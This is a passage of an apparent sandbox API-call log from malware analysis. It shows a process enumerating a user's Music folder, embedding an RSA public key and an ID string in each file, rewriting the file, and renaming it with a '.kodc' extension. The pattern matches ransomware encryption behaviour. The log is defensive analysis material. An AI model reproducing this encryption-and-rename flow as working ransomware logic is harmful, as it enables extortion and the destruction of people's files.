dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad00 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ace8 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acb8 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aca0 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d9a8 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.000] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0xbc52, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xbc52, lpOverlapped=0x0) returned 1 [0099.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0099.000] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbc57, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.000] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0099.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.000] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.000] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.000] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.000] CloseHandle (hObject=0x5cc) returned 1 [0099.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0099.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0099.005] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2pX7N-b_.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2px7n-b_.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2pX7N-b_.mp3.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2px7n-b_.mp3.kodc")) returned 1 [0099.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.005] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.007] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45591320, ftCreationTime.dwHighDateTime=0x1d5c0a5, ftLastAccessTime.dwLowDateTime=0x3f3c29b0, ftLastAccessTime.dwHighDateTime=0x1d5c0c7, ftLastWriteTime.dwLowDateTime=0x3f3c29b0, ftLastWriteTime.dwHighDateTime=0x1d5c0c7, nFileSizeHigh=0x0, nFileSizeLow=0x2945, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3 ErXRNCe_-x.wav", cAlternateFileName="3ERXRN~1.WAV")) returned 1 [0099.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.007] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3 ErXRNCe_-x.wav") returned=".wav" [0099.007] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3 ErXRNCe_-x.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3 erxrnce_-x.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.007] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=10565) returned 1 [0099.007] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.010] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x291f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.010] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.011] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.011] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x2945, lpOverlapped=0x0) returned 1 [0099.011] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.011] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.011] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.011] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.012] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.012] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.012] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.012] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.012] GetLastError () returned 0x0 [0099.012] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.012] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.012] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.013] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.013] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2950) returned 0x9ba4d90 [0099.013] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d9a8 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aca0 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d9f0 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acb8 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ace8 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad00 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.013] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ace8 | out: hHeap=0x630000) returned 1 [0099.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad00 | out: hHeap=0x630000) returned 1 [0099.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ad00 [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ace8 [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad00 | out: hHeap=0x630000) returned 1 [0099.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ace8 | out: hHeap=0x630000) returned 1 [0099.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.014] GetCurrentThreadId () returned 0x42c [0099.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8fe98 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.015] GetCurrentThreadId () returned 0x42c [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ace8 [0099.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad00 [0099.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acd0 [0099.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.016] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x2945, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.016] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.017] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.017] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.017] CloseHandle (hObject=0x5cc) returned 1 [0099.019] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3 ErXRNCe_-x.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3 erxrnce_-x.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3 ErXRNCe_-x.wav.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3 erxrnce_-x.wav.kodc")) returned 1 [0099.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.019] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.021] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fa5daf0, ftCreationTime.dwHighDateTime=0x1d5baee, ftLastAccessTime.dwLowDateTime=0xaeedd990, ftLastAccessTime.dwHighDateTime=0x1d5b93b, ftLastWriteTime.dwLowDateTime=0xaeedd990, ftLastWriteTime.dwHighDateTime=0x1d5b93b, nFileSizeHigh=0x0, nFileSizeLow=0x52df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cKhQfnc9b5ul_vPwo.m4a", 